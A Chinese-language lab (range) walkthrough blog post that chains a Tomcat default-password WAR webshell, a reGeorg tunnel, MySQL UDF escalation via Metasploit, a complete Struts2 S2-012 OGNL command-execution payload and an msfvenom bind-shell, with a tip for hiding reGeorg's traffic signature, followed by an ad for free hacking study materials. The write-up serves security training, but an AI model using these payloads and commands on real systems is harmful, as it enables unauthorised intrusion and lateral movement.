ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

靶场攻略 | 记一次实验靶场练习笔记

靶场攻略 | 记一次实验靶场练习笔记 靶场攻略 | 记一次实验靶场练习笔记前两天朋友分享了一个实验靶场感觉环境还不错于是对测试过程进行了详细记录靶场中涉及知识点总结如下War包制作regeorg内网代理工具的使用UDF漏洞利用Struts2-012漏洞利用Msfvenom模块的使用本次实验靶场的网络拓扑结构如下图所示01获取web据点首先访问朋友给定的web服务器端口为tomcat应用的默认页面如下图所示如果刚开始没有思路的话可以百度搜索一下Tomcat示例页面相关漏洞情况。访问目标manager后台目录尝试tomcat默认口令tomcat/tomcat进行登录登录成功之后tomcat管理后台有个部署war包的功能可以通过上传war包getshell获取服务器权限。在攻击机kali中生成war包后门可以用自己的木马也可使用kali自带webshell默认路径/usr/share/laudanum/jar cvf shell.war xx.jsp在WAR file to deploy 功能处上传并部署后门war包单击选择文件选择生成的war文件并确定点击击deploy按钮就完成了上传。验证是否上传成功浏览器访问注意事项根目录war包文件名jsp webshell文件名比如我上传了的war包名为cmd.war木马名为cmd.jsp在浏览器地址栏中hxxp://x.x.x.x/cmd/cmd.jsp接下是连接上传的jsp一句话使用C刀连接目标服务器的jsp木马下载地址https://github.com/Chora10/Cknife 可自行编译或者下载网上的程序虚拟机里执行。菜刀成功连接后会以树状形式显示webshell文件所处位置如下图所示02添加代理拿下web边界机以后一般情况下分两种情况有内网以此为跳板攻击内网其他机器摸清目标内网拓扑环境拿下靶标系统无内网如果是项目就可以收工了不是的话就可以作为代理池的一部分下面的情况属于有内网的环境查看本机IP地址发现两个网卡都有内网地址。目标web服务器并无探测主机存活的工具两种方式自己上传端口扫描工具||脚本使用隧道代理工具代理自己的工具进入目标内网中做初步的信息搜集。此处选择第二种方式上传regeorg程序的tunnel.jsp脚本到目标服务器的shell目录下web访问返回连接成功的信息(Georg says,’All seems fine’) 如下图所示此为该工具流量硬特征建议在下载后修改该字符串或者使用升级版的neo-regeorghttps://github.com/L-codes/Neo-reGeorg 去特征且传输加密使用regeorg工具建立隧道命令如下Python regeorgsocksproxy.py -u hxxp://x.x.x.x/tunnel.jsp -p xxxx-u 代理木马链接-p指定传输端口在proxychains工具配置文件下添加regeorg打通的代理端口vim /etc/proxychains.conf 在最后一行添加regeorg的配置好的传输端口即可代理nmap到内网扫描172网段敏感端口使用TCP全连接扫描一些Nmap使用语法http://mang0.me/archis/40a439a4/03UDF漏洞利用通过扫描得到的MySQL应用信息尝试弱口令连接一样的思路哪个应用不会搜索哪里查看security_file_priv是否配置命令:show variables like ‘%secure%’;显示结果对应解释Secure_file_privnull //不允许导入导出文件Secure_file_privD:/ //允许导入到指定目录Secure_file_priv‘’ //允许到任意目录Secure_file_priv”/” //允许到根目录发现为空可以写任意目录使用proxychains将msf代理到目标内网中利用MySQL的UDF漏洞进行命令执行。如果忘记模块可以先search 需要的模块内容关键字Use exploit/multi/mysql/mysql_udf_payload查看未设置的参数 show optionsPassword和rhost参数可以设置Set rhost 172.16.15.16Set password 123456 run虽然显示没有会话但是so文件已经传上去了使用默认的MySQL命令连接执行自定义函数成功执行说明udf提权成功。04S2-012漏洞利用代理nmap到内网扫描10网段机器敏感端口发现10.10.60.250:8080存在struts2-012漏洞Struts2-012 payload 测试%{ #a(new java.lang.ProcessBuilder(new java.lang.String[]{ls,-al})).redirectErrorStream(true).start(), #b#a.getInputStream(), #cnew java.io.InputStreamReader(#b), #dnew java.io.BufferedReader(#c), #enew char[50000], #d.read(#e), #f#context.get(com.opensymphony.xwork2.dispatcher.HttpServletResponse), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }成功读取/etc/passwd文件10.10.60.66和172.16.15.16一样的思路。弱口令admin/password上传菜刀的jsp木马使用蚁剑服务器管理工具连接成功Msf生成Linux木马msfvenom -p linux/x86/meterpreter/bind_tcp rhost10.10.60.66 lport1234 -f elf shell.elf生成完成后将该木马程序上传到目标服务器的web目录下赋予权限在msf中开启监听模块执行程序即可拿到会话设置msf下handler模块必要的参数set payload linux/x86/meterpreter/bing_tcpSet rhost 10.10.60.66Set lport 1234exploit -j 后台获取会话Sessions 可查看会话 -i 进入该会话本次实验到此结束通过弱口令并结合应用特性拿到主机权限使用内网代理工具建立隧道探测内网段端口及对应漏洞拿下对应主机权限。如何系统学习网络安全网络安全作为数字时代的核心技术基石已成为保障各行业安全稳定运行的坚实屏障。筑牢网络安全的防线掌握先进的防护策略和技能正上升为国家与企业发展的战略优先级。构建稳固的网络安全能力是一个体系的工程需要从夯实基础理论出发持续深化到攻防对抗与应急响应的实战层面。如果你是准备学习网络安全黑客或者正在学习我可以把我自用的360独家内部资料分享给你包含以下内容你应该能用得上①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
返回列表